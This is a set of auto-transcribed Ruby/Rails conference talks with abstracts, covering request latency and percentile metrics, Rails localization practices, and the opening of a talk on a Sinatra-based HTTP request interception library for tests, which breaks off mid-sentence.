DevOps conference and zero people raised their hand. I don't expect you to know the answer to this question. But it's actually a really important question to ask because your end user's experience is 100% directly impacted by this. Like someone who goes to your production app and tries to use it experiences 100% of your routing layer twice for every request that they make. And like, is it a long time? Who knows? None of us. And then on top of that, like so not only is there this question of like how long does it take in the perfect case from like the time they make the request to the time your app is processing it and then from the time your app stops processing it to the time they get the response, like none of that time shows up in your nice new relic graph that's like how long this took. Like zero of those milliseconds are included in that number. So you can look at the number and be like, yeah, we answer all our requests in, I don't know, what's a good Railsy number, 250 milliseconds. I feel like that's a pretty common one. But like how much time do you need to add to that before you know how much your users are actually experiencing? How do you even find out? And then once you find out, what if too many requests come in at exactly the same time? Just having that routing layer where all of your requests come to one point and then they fan out across other points, this was like the main point of that RAPDNious article was that Heroku uses and honestly, like there's nothing else that you can really do that makes sense, you just kind of randomly assign them. Like, well, here's one for you, here's one for you, here's one for you, here's one for you. And the problem is almost all Rails apps have like some requests that take 10 milliseconds and some requests that take like a second and a half. And when you're just throwing them out at random to every server that can possibly service them, unfortunately, statistically, it is very likely that you will end up with two horribly slow requests stacked up behind each other and then the really fast requests start to stack up behind those and it isn't very long before you like see a 30 second timeout and you're like, that makes no sense. That request, New Relic says that request takes 10 milliseconds, why would it hit a 30 second Heroku timeout? And so it's not perfect, but you can at least start to get a little bit of visibility into this using a New Relic feature called QTracking where you have your load balancer set a header that says, I got this request at this exact time. And then your app server says, well, I didn't get this request until this much later time. And then New Relic can add a thing to your graph that says, well, your requests are spending about this much time just sitting around waiting for a server to have availability to answer them. And that can be a completely separate thing that people don't measure that is adding 50% sometimes. I've seen that to the total user waiting request time. And there's just like, it wasn't even measured, no one knew it was happening. Everyone was just like, that's weird. It seems to take a lot longer to get a response than New Relic says it takes to make the response. I wonder, hmm, you know. So ultimately, what I'm trying to impress on all of you all is that the overall request time is not the number that Skylight New Relic pick a service. I don't really care tells you your request takes like that's a good number. Measure that number, pay attention to that number. If that number changes a lot, you want to know why that number changed a lot because that's really important. But don't think that that number means that that's how long people are taking to get the results of your app running. Don't, right, exactly. It's not the time that you measure that your app takes to run. And honestly, even that queuing track that I was talking about with New Relic, that requires that those clocks on the load balancer server and Ruby app server be synchronized so precisely that they can measure milliseconds accurately. And it's very easy to end up with clocks that are milliseconds off and then your measurements are off. And so what you want instead is a holistic measure of how long does it actually take to be a person on the Internet say, hey, Rails app, I want to know a thing. And then for the Rails app to say, okay, here's your thing. And then it arrives back. So the strategy that I have actually had that is really successful here is to deliberately create a Rails controller that returns an empty string and then set up a service like RunScope or 1000 eyes or one of the kingdom even, like there are services whose entire reason for existence is so that you can make requests to your own stuff from all over the world and find out how much delay your overall infrastructure adds to your application. And if you have a Rails app that returns an empty string, I guess honestly you could even do like a rack middleware that returns an empty string because New Relic measures the Rails framework overhead. So you just want to know about all of the time up to the time it hits your Ruby app and all of the time after it comes out of your Ruby app. And so you can use one of these monitoring services to say this is like the weather report for our users around the world. And honestly, I've worked at companies where 60% of their traffic was the US, but for no particularly apparent reason, 35% of their traffic was from Brazil. And then you really care a lot about network conditions changing and meaning that traffic to Brazil got a lot slower today. You should figure out why that happened and maybe think about setting up a CDN in Brazil. Because if your traffic numbers are relevant to your business making money, they almost always are, this matters a huge amount. And right now, chances are good, like nobody has any idea what they are. Are they bad? We don't know. Are they great? We don't know that either. Maybe they're great. Like honestly, if all of you go home today and start monitoring these numbers and their fantastic numbers, I will be extremely happy for you. Based on past experience, unfortunately, they're probably not going to be that great. But knowing what they are is way better than having no idea that they exist. Very closely related to things taking longer than you think they do. Let's talk about servers. So I'm assuming that if you have things deployed, you have servers. This seems like a good bet. Let's talk about what's happening on your servers. You buy them and you rack them or you rent a fraction of one or, I don't know, you rent a fraction of a virtual machine that is a fraction of a physical machine. It happens. You end up with a piece of a computer and some stuff is happening on that computer. And even if you bought the computer yourself and racked it yourself, it's still running a ton of stuff and you have no idea what that stuff is. And I'm not going to tell you that you need to know what all of that stuff is, but I am going to tell you that it's really important to know how that stuff is impacting the thing that you do care about, which is your users and experience. And so a big thing that impacts this, whether you use Ruby or Python or Node or Go, you have a runtime for your application, right? Even Go has a garbage collector and a framework that all Go programs run inside. And what that means is your application sometimes isn't running while your program is running. And when that happens, your code isn't running, your instrumentation isn't running, and you have no idea how long that took. So if the garbage collector runs and your entire application just stops for a while, how do you know that that happened? How do you know how long it took? Like, you can't write. It's really hard to write code that measures time that your code wasn't allowed to run. So based on real-world usage, definitely Go and Java and Ruby all have garbage collection pauses where execution of your code just, nope, hang on, wait, got to collect some garbage. Okay, that's good, you can keep going. And Ruby, I guess, recently has added a thing called GC profile that at least reports after the fact how long garbage collection took, which is awesome. But there are more reasons than just garbage collection that your code could end up paused. And so what you actually want is some way to say, I can tell that my code stopped working, stopped running, right? It was still working, but it stopped running for a second. And then it started running again. And how long was that? And there's this, I learned this trick from somebody who works at PaperTrail, Larry Marburger. And I think he got it from some of his colleagues at PaperTrail. It's super clever. What you do is you start a new thread with thread.new. This is like Ruby specific, but you can do this in any language. You start a new thread, and then you say, what is the time? Sleep 1. What is the time? And then you subtract them and you send the difference off as a metric. And if your code stops running, sleep 1 will take longer than one second. Little known fact. And so by monitoring how much wall clock time passes while a thread in your application is calling sleep 1, you can accurately graph how much overhead the surrounding interpreter is adding to your overall execution time. And I have definitely seen this happen where you're running a Ruby program and you're like, that's weird. It seems kind of slow. And then you check the, like, how long does it take to sleep for a second graph? And you're like, oh, my God, we're spending 150 milliseconds doing something that's not running my program every second. And sometimes that means you have a memory leak. Sometimes that means, like, that machine just got into a really bad, weird state. But at least then you know. And at least then you know that it's exactly that app server that's having this problem and all the other app servers are fine. Super useful. I guess very, very closely related to this is the virtual machine that you're, now that we're talking about interpreter lag, you're probably also running that interpreter inside a virtual computer. And Amazon, Digital Ocean, Paroku, Engineer Art, OpenStack, you're either running on a VM or you're running on a VM inside of a VM, or maybe even if you use Docker, a VM inside of a VM inside of a VM. Hooray. And as you can imagine, this is yet another way to have weird times where your code doesn't run and you don't actually know it because your code literally couldn't run. And it's even worse than that because sometimes you'll end up with resource specific contention, right? Like in a VM, what if you're on a VM and one of your co-tenants suddenly, like, your co-tenant is running a memcached server. And so it's just like all the memory I.O. is going to your co-tenant. How do you even know if that's a problem? What if they're doing something really like storage heavy and that means you can't get I.O. anymore? And so there's like, at a minimum, the resources that you may care about are CPU and memory and disk, right? And network I.O., I guess, flavor number two of network of I.O. And you don't know when you get a shiny new empty VM, like, maybe everything is great and maybe that machine has basically no network I.O. available or has basically no memory I.O. available because of co-tenants that you don't know exist. And so Netflix has a really clever way to check for this, I guess. They've written about it kind of at length. And what they end up doing is Netflix spins up a new EC2 instance and then before deploying to it, they shove a giant pile of benchmark suites onto it and they run the benchmark suites and then they compare it to what they've decided is acceptable performance for that price point on EC2. And if it's below their acceptable benchmarks, they throw away that VM and get a new VM and then try the benchmark suite again and then throw that one away and then get a new one. And eventually, they hit an instance that meets their criteria and they said in their paper that they have observed almost an order of magnitude in difference in performance at the same price point because Amazon sells both the newest generation of hardware and two or three or sometimes even four generations old as the same VM, very large air quotes around same. And then you have to deal with like co-tenancy issues where you may have a VM on a very old, very heavily contended physical machine, you may have a VM on a brand new, uncontended machine. And like, so for Netflix, they said that doing this and I'm probably going to get these exact numbers wrong. I'm sorry, it's been a while since I looked at that paper. They saved something like a third of their overall server costs by doing this benchmarking and only accepting VMs that met their minimum criteria because of the amount, like they have a static amount of traffic that they need to serve, but they got machines that were more capable to do it at the same price point. And so they just needed to spin up less machines and pay Amazon less money. I guess, so you're probably not Netflix, this probably doesn't matter to you that much. But it is at least something that you can be aware of when you're like, man, 10 servers seem to be enough to serve this traffic last week, right? And then specifically, like, do you know what it is that your app cares about? Like, it is entirely possible that your application is in completely CPU bound and you honestly don't even care if your co-tenants are doing tons of IO. But you care a lot if your co-tenants are doing video encoding. Maybe it's memcache server and you're just memory IO bound. Maybe it's Postgres and you're everything bound. Postgres just wants everything. But like, this is the kind of thing that actually matters. And knowing this difference can be a really big difference in how many servers you need, how much your servers cost. And as you get bigger and bigger, like, one third more performance for the same cost becomes a larger and larger number that is worth putting more and more effort into getting. So now that I've convinced you that you need to measure all of these things that you weren't measuring before, let's talk about metrics. I guess good point about the Ruby community, they're pretty good at measuring metrics. That's great. New Relic makes it really easy. You're gem installed New Relic. Hooray! And metrics. Metrics are really important. Making things, as we were just discussing, is really the only way to know what's happening. Without metrics, your production is kind of a black box. And you're like, oh, things aren't as good as they were before. I don't know why. Or probably even how, exactly. Because I wasn't measuring, wasn't able to measure, didn't know how to measure the things that matter. So I saw really, the first time that how important metrics are really hit home for me was in 2009 at GitHub's first code conf. I saw a talk by Code of Hail called metrics metrics everywhere. And kind of the underlying point of his talk was that the reason that all of us have jobs and the reason that all of us write software is to deliver business value. Whether that's to our bosses or to customers or to clients. Like most of the software exists for the purpose of delivering business value, especially if you're getting paid to write it, right? And if you can't measure it, you can't tell if that is what you are doing. So having said that, you're probably not super impressed by me telling you that metrics are important. So you do need to know what's going on. There's a catch. Once you have metrics, you have a tendency to become convinced that you now understand what is happening. And I don't blame you. I do this too, right? It's like a human thing. You're like, oh, I'm measuring a thing. Now I understand it. Just like being able to see the speedometer does not tell you how the cars transmission and engine work. Being able to see a metric on your application does not tell you about how and why it is working. It just tells you something is very different than it was before. And now you need to figure out what it is and why it is different. And a very common problem is that having metrics, having some visibility makes people think that they have total visibility, and that just isn't how things work, unfortunately. So at the end of this little bit about metrics, this is probably going to be you instead. I'm going to talk about some ways that metrics actively mislead you. And the biggest thing that causes this kind of misunderstanding driven by metrics is averages. When you have a lot of metric information, especially if you have a bunch of app servers, the easiest way to distill that down into something that you can quickly communicate is to take the average. A super good example of this is the way that New Relics dashboard, when you first open it, it's like, here's a giant number. This is the average of all requests across all app servers. So you see those graphs, you see the numbers going up and down, you're like, great, now I know what's happening with my app, right? Unfortunately, no. Brains are really highly developed, carefully tuned pattern matchers. This is how humans can see Jesus in toast. This is how you can see an average and think, I know what that means. So your brain's immediate extrapolation from an average is probably what's called a normal distribution. There we go. Normal distribution. You think, oh, the average is going to be right at the top of that. This is often called a bell curve and it's what happens when all of the inputs into the graph are generated by a random function. Tell me if you think that your app is a random function. I mean, maybe it feels like it's a random function. But your app is not actually a random function and the practical upshot of that is that it doesn't look like this at all. This is a more realistic graph of what might be producing an average that's right at the zero point on that graph. To kind of drive home how wildly misleading averages can be, let's look at a bunch of real life graphs at the same time. So this is a whole bunch of different measured metrics from a real life thing. It was a MySQL benchmark. It doesn't really matter what it is. From left to right, it's collecting the number over time. So near the left, it's like the things that were fast and then as you go to the right, it's things that were slower and slower and slower during the benchmark. And so the small black vertical lines that you maybe can't see very well represent the average for that particular line. So to make it easier to see, I'm going to line up all of the averages of this same graph. So not only do any, none of these look like a bell graph, right? Bell curve, not a single one of these looks like a bell curve. Worse than that, most of them have zero actual data points at the average line. It's really characteristic to have a very large number of points either clustered together in the fast zone or spread out over like the long tail of slow things. But like if you look down near the bottom, like some of these lines don't even have a single result that's near the average line. And so if you're looking at New Relic, you might not even have any requests that take the number, like the amount of time that is the number of milliseconds that you're seeing in giant font on your dashboard. This is the problem of averages, right? Unless your metrics are being generated by a random function, the average is going to actively mislead anyone who sees it. There's a great quote about this from a tweet by a friend of mine, Esopharek, problem with averages, right? On average, everyone's app is awesome. And so, again, averages, I guess the single good thing that is really great about averages is that they can tell you that something changed, right? You can say, oh, my average was this before, but my average is this now. That's weird. The problem with averages is that they can't tell you what changed or how it changed. And it's actually possible to get that information out, and so I'm going to show you how to do that. So while averages can tip you off that something changed, so here's a graph of an average. And as you can see, things are taking about less than 100 milliseconds, but that effectively means there could be tons of things happening that take about 100 milliseconds, or there could be tons of things happening that take 10 milliseconds and tons of things happening that take three seconds. It's an average, so there's literally no way to know. One way to get around this is to graph the median rather than the average. The median is the number that was bigger than half of the numbers and smaller than half of the numbers. The great thing about the median is that you are sure that it actually happened, right? The average may or may not have ever actually happened, but the median definitely happened. And so if we add the median to this graph, you can see on the purple line, we now actually know more information than we did before. At least half of the values are actually very, very fast. It looks like around in the 10 millisecond range, maybe 20 milliseconds. So even though the average jumped all the way up to 150 milliseconds at one point, at least half of the requests were happening still equally quickly. They didn't slow down. That tells us that since most of the requests didn't slow down, this wasn't like an application-wide change, right? We didn't suddenly get a really slow load balancer. We didn't see really, right? This wasn't a really a network switch problem where all of the traffic was impacted. The next thing you can do is graph other places. The median is the 50th percentile, right? Half is below, half is above. Start graphing the 95th percentile. 95% was below, 5% was above. Here you can see that the slowest 5% of requests got dramatically slower. More than 10% slower than the median. And that's what dragged the average up. Oftentimes, even better than the 95th percentile is the 99th percentile. This gives you a good idea of what one, it's one out of 100, right? So this is actually a pretty good indicator of what the occasional slow request looks like, right? Well, I had to rescale the graph. And the slowest 1% of requests are now clearly the entire reason why the average tripled. The median stayed exactly the same. The median is now a flat line. And that slowest 1% is probably some single specific controller action that you now need to go find and figure out what exactly happened to that specific single thing. And so just by graphing the percentiles rather than the average, we can immediately rule out about half of the possible problems that made our average slower. And it works the other way around, too. If you look at the graph of the 99th percentile and it isn't dramatically different even though your average is higher, then you know not to look for a single controller action. You know to look for a systemic problem. Aggregate graphs, this is another really common thing where aggregation is a fancy way to say, I got the many versions of this metric from many servers and then I averaged them. So here, again, here's an average graph. This one happens to be taken from the actual Bundler API. And it is a graph of the trick that I mentioned where you call sleep 1 and then you see how long it took. So the number that we're tracking here is milliseconds and it went from taking two milliseconds to, you know, one second plus two milliseconds to taking one second plus five milliseconds. And that means that garbage collection pressure must have been twice as bad, question mark. We don't know. This is an average. And you can improve this with breakout graphs. If you are collecting a number from 25 machines, put 25 lines on your graph instead of one that will mislead you about what all of the different machines are doing. Here is a breakout graph of the same data. Kind of like I was mentioning before, with the breakout graph, we can see, holy crap, this had to be rescaled. One of the machines started taking 35 milliseconds per second to sleep. But all the other machines were basically fine. And so we wound up resolving this issue by just killing the one dino that was having trouble and restarting it as a fresh dino. But we didn't have to nuke all of our dinos. We didn't have to write this narrow down the problem immediately just from having a breakout graph. So do it. Visualize your data. Here is an example of why visualizing your data is so, so, so important. These are some different data sets. Each orange dot is a single entry on that data set. Can anyone guess what the blue line is? So that average, average, average, average? It's actually even worse than that. The average of y is exactly the same on every crack. It's actually even worse than that. All four data sets have the same average of x, average of y, variance of x, variance of y, correlation of x and correlation of y, and the same linear regression. Actually graph your data and then look at it because the numbers of the averages and the variances and the correlations and the linear regressions don't contain any of the information about what is different in those graphs. One final note. A lot of people that even talk to me about how awful averages are, I then am like, oh, hey, so how do your alerts work? And a lot of people have alerts that are set up to only talk to them after the average is bad. And as you can maybe guess, by the time the average is bad, it is too late. Definitely break out your alerts as well as your graphs. You want to know when the first server went down, not when the average of the servers is a down server. Right. So ultimately, I really just wanted to let you guys know that the network is a part of your application. Most people don't think about it because they don't have to interact with it in their day-to-day development on their own local machine. And after you have deployed your application, it is really user experience that matters, not how many milliseconds your Ruby app spends running code. That's it. So the question was, if you don't alert on averages, how do you prevent continuously alerting, getting alert fatigue, and then not noticing that something actually bad happened? And the question included a note that there is no silver bullet for this. And unfortunately, the answer is there is no silver bullet for this. So the best plan that I have ever seen from the best operations people that I have worked with is figure out what the baseline of your system when it's functioning is and alert when your system is not that. That means figuring out how many requests you're successfully serving per minute and alerting when it deviates from that more than 50%. Figuring out when it's normal to have that deviate and then not alerting on that. And it's actually a ton of work because every single application has a completely different norm. Some Rails applications, they serve like 50 requests a minute and that runs their entire profitable business. Some Rails applications serve hundreds of thousands of requests a minute and they're not profitable yet. You need to figure out how it is that your metrics look when your company is functioning, both software-wise and company-wise. And you need to alert when it's not the thing that gives you the indicator that things are okay. That's really the best advice that I have for you. Five seconds. Any more questions? All right. I'm happy to talk about this stuff later. Bye.
|
When you look at your response times, satisfied that they are "fast enough", you're forgetting an important thing: your users are on the other side of a network connection, and their browser has to process and render the data that you sent so quickly. This talk examines some often overlooked parts of web applications that can destroy your user experience even when your response times seem fantastic. We'll talk about networks, routing, client and server-side VMs, and how to measure and mitigate their issues.
|
10.5446/31511 (DOI)
|
Okay, so we're at 10.50, so I'll go ahead and get started. So I'm going to be giving this talk on localization and translation and internationalization in your Rails apps. It's a cleverly entitled finding translation, although someone yesterday suggested the alternate title of many, many yaml files, which we'll get into why that might be a fitting title for this talk as well. But we'll start out by defining our terms. Localization is the process of adapting internationalized software for a specific region or language by adding the local specific components and actually translating the text. Internationalization refers to the process of actually setting up your app in such a way that it can be translated. And we'll be talking mostly about how to set yourself up for success in terms of when you are designing your app, even if maybe you're not even planning on having it translated off of the bat. Some of these processes and things will be good things to have in mind in any case. So thanks Wikipedia for those definitions. Let's get rolling. In plain English we're talking about translating and more importantly getting ready to translate your app. So what are we talking about when we talk about translation? There's the most straightforward type which most people are going to be thinking about when I say the word translation which is English to French, French to Arabic, English to German, Swahili to Esperanto, Spanish to Cantonese, etc. Other things that are important in this translation process though is what country you're actually talking to. So are you talking to British consumers? Are you talking to American consumers? Are you talking to Portuguese consumers? Are you talking to Brazilian consumers? Those populations are going to speak the same language but are not necessarily going to have the same content, be delivered to them. Another thing you want to be aware of is the register, whether that's formal or informal, professional or like your Twitter feed, AP style or MLA style I guess, things like formatting, so on and so forth. We're mostly going to be talking about the first type but you should always have in mind the second type. When you're doing a translation you should be thinking about what country the people using that language are going to be coming from. Things that will be relevant to that are things like units of measurement, government legal terms, date formatting, so on and so forth. And the third type is not something we're going to talk about really but your translators should be aware of where you're coming from in terms of the register that you want to convey in your app so that they can write to the same kind of audience. I could also see using these same tools to transpose between registers. So say you had a kids and parents version of your site, you could use some of these I18N conventions to do that as well. I've never done it but it could be fun. So who am I? Points if you get this joke, 24601. I'm Valerie Willard. On Twitter I'm at Valerie codes and you should tweet this talk because at mentions are my lifeblood. I'm a Rails developer at Panoply which is a podcasting platform. We're part, yes, podcasts. We're part of Slate. And if you want to geek out about podcasts, please find me after the talk and I will give you all my recommendations and take all of your recommendations and my subscription list will continue to balloon uncontrollably. I have interest in linguistics, translation and language studies. So prior to becoming a developer I was a French major. I studied cognitive science with an emphasis in linguistics. So I've done a bit of translating in an academic setting and was hoping I could maybe add some insight to folks who are maybe not as familiar with the translation process who are getting ready to translate things. So without any further ado, so you want to localize your app. You might feel like this dog especially if you're not familiar with a lot of the pitfalls that can come along in this process. So when should you think about localization? You should think about it now. Even if you don't actually foresee a future in which you want to have localized versions of your app, if you think about your possible audience, it is probably not just US-based English speakers. If you think about just the number of languages that are spoken just in the United States, if you're limiting yourself only to English speakers, you are really limiting yourself. So it's something that should be on your radar as a possible thing that might come down the line. And even if you never localize it, you won't be hurt by using some of these conventions and they can give you other wins in your development process. So when should you think, when should you internationalize? So you want to be thinking about this, again, before you need to. For example, don't hard code strings into your views. This is a very easy win. You can use locale keys in your views, have those reference a YAML file, and that way you can have all of the copy for your app separated out from the actual code. So say if you have someone who's not a developer who wants to make changes to copy, you don't have to have them dig through the code and make those changes. You can have them edit a YAML file, which is probably going to be much easier for everyone involved. So there are lots of built-in tools for Rails localization. There's this I18N guide, which goes over the basics of how to use those tools, how to create keys that you then reference in your app. The default setup for Rails localization is to have a YAML file, as I've alluded to a couple times, where you will have a key and a string. And when you reference that key in your application, that string will be pulled from the YAML file. And then you'll have YAML files for each locale, so you'll have a French one and an English one and so forth. And based on the locale setting on your app, the correct string will get pulled in. And there's a lot of things built in for you. There's also a localize, so there's I18N.t, which is translate that refers more to the pulling the correct strings. And there's also localize, which refers more to, as I was mentioning, the units of measurement, things like that, that'll be related to where the person is from. Okay. So you've got some YAML files with some strings in them. This can get annoying really fast, especially if you have, say, maybe hundreds of strings or thousands of strings or tens of thousands of strings in your app. Depending on how complex your app is, these files can get really unmanageable. So you should be thinking about whether this is something that is practical for you and for your app and your organization. One way you can maybe make it a little easier on yourself is to customize these YAML files to be per feature or something like that so that you don't have one single YAML file that's storing every single string that you use. But at the same time, this is still not something that you probably want to use for a super, super complex app. Here are some helpful gems in your localization journey. One of them is Rails I18n. This provides tons of translations in different languages, different locales for the errors that are kind of baked into Rails, active record things, default date formatting, things like that so that you don't have to waste your time doing those things. So that is super helpful to kind of get your localization stuff off the ground. lochal app is a gem and provides a web interface for storing translations that translators can log into. It's a paid service. I'm not sure if there's a free tier, but something worth looking into if you're looking to add translations. And it's also tied to paid translation services so you can pay someone from there to actually go in and translate all your strings for you. Globalize is a tool you're going to want to use if you're adding translations to your active record models. So if you want to, say, localize attributes on a model, say you have a blog and your posts are stored as active record models and you want to have alternate versions of your blog posts in different languages, this would be the tool that you want to use for that. Through Geocoder, you can, the Geocoder gem, which also does a lot of other things, but one tool that will provide you is being able to set a lochal based on a user's IP address. So that's also super helpful. I18n Tasks is a gem that will go through and report keys in your YAML files that are missing or unused. It'll remove unused keys optionally, and it can also pre-fill missing keys from Google Translate if you want to play it fast and loose. One possible workaround for this YAML nightmare that we've described is proposed in this Rails Cast episode that you can look into. It provides a sort of framework for a Redis-based backend for the localkies. Another possibility would be to do, like, an active record or another database-based backend. The things that you'll want to keep in mind, though, are that these keys are going to, there's probably going to be tens, dozens of them loaded on every page, so they'll need to be accessed all of the time. And so in memory, store, or some sort of cache is probably going to be preferable to having to do a database lookup at every time a key is referenced. If you decide to just stick with the YAML, you can edit it the usual way, maybe in a graphical YAML editor. One thing that you might want to keep in mind when you're thinking about how exactly you want this translation backend to work is that the people who are doing your translations, who are going to be entering these keys, are not necessarily going to be developers. So if you've got people from the marketing department, if you've got professional translators, you probably don't want to tell them to, like, boot up Sublime Text and write some keys in. You probably want to provide some sort of gooey or graphical interface for them to make their lives a little bit easier. So these are the things that I feel like are most important to consider when you're talking about how you're going to localize something. First, you need to know what needs to be translated, kind of the scope of is this a 10,000 line project, is this a 100 line project? Do we need to hire a professional translator because we need really polished translations or will a Google translate situation be adequate to our needs? Do we need to translate the attributes of a model? What are maybe the length of the strings that we want to translate related to, like, how readable maybe they'll be in, like, a YAML interface? Are there special characters that you'll need to think about whether your database or data store of choice supports? And what information, in addition to just those strings, is it helpful to provide to your translators? So what tools do they need to give you a really good translation? Maybe some contextual information, maybe a nice gooey so that they don't have to edit things in sublime text and push them to GitHub is maybe the best solution there. So this is something that I've come across in looking over apps that people have tried to localize. Any time you are concatenating, say, local keys together to form a single sentence, that's probably a point at which you need to look at your life and look at your choices and find out a way not to do that. The reason for that being the first in my parade of foolish assumptions and that is that fragments can be translated with any accuracy. The reason for that is probably clear to you if you've studied a foreign language, but syntaxes are different in different languages. The subject verb object ordering may be completely different. The verb may go at the end of the sentence. The context of the full sentence may be needed for conjugation or for gendering of nouns, things like that. Instead what you'll want to do is use, so there's an example here of a variable in a full sentence if you need to pass in the name of a column where you have an error or something like that or a proper noun. So the I-18-N in Rails will support this passing of variables so you can just pass in a key and a variable and the variable will get dropped into that key like so. So here has the errors variable and that way you can provide your translator with the full sentence and context in addition to the variable that will just be replaced. Another pitfall is assuming that pluralization works the same in other languages. I included a link to this very thorough sort of survey of pluralization rules in tons of different languages, but the gist of it is that in English we generally have the same pluralization for zero and more than one thing, kind of the same grammatical structure, and then a separate pluralization rule if there's one thing. Other languages do not necessarily do this in the same way. They may make different distinctions where zero things follows one rule, one thing follows another rule, more than one thing follows a third rule. So don't hard code these strings. Instead I-18-N provides you with a very useful count variable where you can just define these different keys for one other and zero and pass an integer in as a count and based on the value of that integer, the one other or zero key will be dropped into your view. Another thing to be aware of when you're translating is that other languages are not necessarily going to use the same level of specificity. You may need to provide more information to your translator than an English string will provide. So things to be aware of here are like gender. We talked about register. They'll need to know whether you're hoping to address your users in a more formal or informal register. Also the words, there just may be more specific words in the other language that they'll need to be aware of what exactly you're talking about. So for example, in Korean there are multiple words for the English word in, one to denote a snug fit in a container, one to denote a loose fit. So these are just things that you should know, things that your translator might need to be aware of. Another thing to know is that a message cannot necessarily be conveyed in another language in the same physical space as it can in English. There in languages that use other character sets, the messages may be much shorter. You may have something that takes one line in English and two lines in French, a general rule that I followed when I was translating French was that it always seems to take more words and more characters to say the same thing in French that it doesn't English. For that reason, you'll need to think about what you want to do if you need to fit more characters in a space or if something will look weird if you have a much shorter string than the English one. Do you want to shrink the text down in certain situations? You probably want to avoid fixed height or width containers unless you're going to test whether that string fits in the fixed height or width container in every language that you support. So this is something to be aware of when writing CSS and doing more of the front-end work. Another scary thing. The text may not always be left to right. So there are a lot of design implications here. So this is screenshots from the BBC's website, one from their Arabic website and one from their North African French website. So you'll notice it's not just the text that's flipped. It's also the logo and some of the design elements, the search bars on the other side because the idea is that the eye will gravitate toward the right side rather than the left. So there are a lot of other design implications beyond just flipping the alignment of the text in the container. Your character set will not always be the Roman alphabet necessarily. So you should make sure that other characters, other character sets are supported if you're planning to support non-Roman alphabet languages. Okay, so you've got all this. You have all of these pitfalls in mind. You've got these wonderful YAML files that are filled with wonderful translations that people are making updates to all of the time. And you have merge conflicts constantly because everything is in a YAML file and everyone is editing it and it's terrible. You're very likely to get merge conflicts, especially if everything is in one place. And because the people doing your translating, adding your copy are not necessarily developers, you probably don't want everyone who makes copy to have access to, say, your code repo. So some things to do here can break up keys based on functionality, based on features. You can add your YAML files to make them a submodule of your main repo so that you can give people access to just the YAML files rather than giving them access to the whole repo. You can have a database store that people edit from that is then pulled into a YAML file in some way or you can just have a database backend for your translation keys. Or you can do something like locallop, which is a web-based interface where people can edit the keys and that can serve as your external source of truth so you don't have to trust those YAML files that are in your repo. You can just pull from that source and trust that everything is fine. The concerns that you'll have in mind, again, are ease of use based on who is doing your translations. You also probably want some sort of audit trail if someone accidentally deletes your English.yaml file. You want to have some rollback, like, catastrophe scenario, whether that's doing a daily database backup, whether that's keeping things in version control in some way, shape, or form. Those are things that you should have on your radar. So another thing that I sort of want to touch on is why do you want to translate your app? Which is not to say that I think it's a bad idea. I think it's great to support speakers of other languages to make our technology accessible in other places to non-English speakers. But when you are deciding to internationalize for a given region, for a given language, there are things that you want to think about before making that choice, before deciding who you want to translate your app for. An example is other countries have different norms around privacy. In general, I would say in the U.S., we're probably more fast and loose with some of our private information than in, say, Europe. There are things that may be considered more taboo to share, such as religion. People are maybe more likely to be sensitive about tracking, about physical location information of theirs being shared. So if your app uses those things, you should think about how that's going to be perceived in the language group in the country, in the culture that you're adapting it for. There may also be legal issues if you're actually intending for another country market. There are things like do not track in Europe. There are issues around, say, copyrighted information and the trouble that you can get into for sharing copyrighted information or copyrighted content in other countries. There are issues of defamation. The U.S., actually, I believe has one of the more lenient stances toward defamatory content. So if there's a chance that defamatory content can be included or disseminated through your app, be aware of the potential legal repercussions that you can face in any country that you're expanding to. Another issue is that the same needs may not exist in that place. So if your app centers around something related to, say, the U.S. healthcare market, that's probably not a thing that's going to translate in other countries. So maybe that leads you to the decision to translate your app for U.S.-based Spanish speakers, but not for Mexico-based Spanish speakers, for example. So my hope is that from this talk, you take away the following things. One of them is to think about localization now rather than later. And hopefully there are things that you can win even if you don't actually decide to do any translating. When you're translating something, be aware of the quality of translation that you need. And if you want a quality translation, your translators should have a good understanding of your app of how it works, of who it's intended for, of what it's intended to do. Also translation is hard. It's a hard problem that I don't think there are lots of easy solutions to. And it's something that if you care about having a quality product for non-English speakers, that you should invest your time in thinking about. And also to know your audience when you're deciding who you want to translate for. And with that, I'm going to be hanging out if anyone has questions. And then there's this slide, which is just all of my information. If anyone wants to get in touch, tweet at me, look at my GitHub, look at my website, I got Valerie.codes, which I think is awesome. And thank you so much for coming. Thank you.
|
Translation, be it a word, sentence, concept, or idea, for different audiences has always been a challenge. This talk tackles problems of translation, especially those that tend to crop up in building software. We'll dive into the eminently practical—how to design apps for easier localization, common pitfalls, solutions for managing translations, approaches to version control with translations—and the more subjective—possible impacts of cultural differences, and what makes a "good" translation.
|
10.5446/31512 (DOI)
|
Hi, everyone. My name is Konstantin Tenhardt and I have to warn you, this is not going to be a funny talk. I'm German. We don't do that. So, but I actually don't live in Germany anymore. Last year I moved to Ottawa, Canada and there's so many Ruby developers in Ottawa. I actually work for Shopify. And in fact, we have so many Ruby developers that we just don't know where to put them and we sent them all down to Kansas to speak at RailsCon. And so, Kat already gave a talk and there's two of us speaking later in the afternoon about how we test and about sprockets. To continue with the shameless self-promotion, you can find me on Twitter and GitHub. My handle is T60. And in my spare time, I'm maintaining a couple of libraries that you might find interesting. One of them is Action Widgets, which is a UI component micro framework, I'd say, for Ruby on Rails. In fact, the slides you just see here on screen are powered by Action Widgets. I'm maintaining smart properties, which is supercharged Ruby attribute assessors, as well as a processing pipeline for Ruby on Rails to model complex business processes. And finally, the one I want to talk today about, Request Interceptor, which is my most recent one. And it allows you to simulate foreign APIs with Sinatra. So, at its core, this talk is all about testing. And specifically, one type of test, tests that involve HTTP connections. So, most of you might know the libraries VCR and Webmark, which are usually used to stub out individual requests or in case of VCR replay requests that have previously been sent to a remote API. I want to present a different approach today and talk about how we can use Sinatra to simulate a foreign API within our test suite. And that is essentially the core idea behind Request Interceptor. So, I guess I best show you how to use the library first and then throughout the talk we dive deeper and deeper into how it actually works internally to the point where I'll show what kind of metaprogramming techniques I used to hook into the Net HTTP library to make all that magic happen. So, yeah, I just mentioned it. Request Interceptor does modify Net HTTP, just like Webmark and VCR. There is no clean way to sort of interject yourself into what Net HTTP does. So, some trickery is required to make that work. But I get back to that later. The idea is that you can use any rec-compatible app and use it as a Request Interceptor that sort of intercepts an HTTP request sent out by your application and reroutes it to your rack app, which will then handle the request in line. And in fact, all you need to know essentially is that Request Interceptor implements a run method which takes a rack application as well as a hostname pattern. So, the hostname pattern is important to know when Request Interceptor sort of starts intercepting requests. It will actually look at the HTTP request and only redirect the request to your own rack app if it matches the hostname. Otherwise, the HTTP request will be made just as a regular remote request. And in the code example here, I define the probably most minimal rack app you could potentially implement. It's simply a Lambda statement that returns an array with a status code, no headers, and a message, hello. And then I use 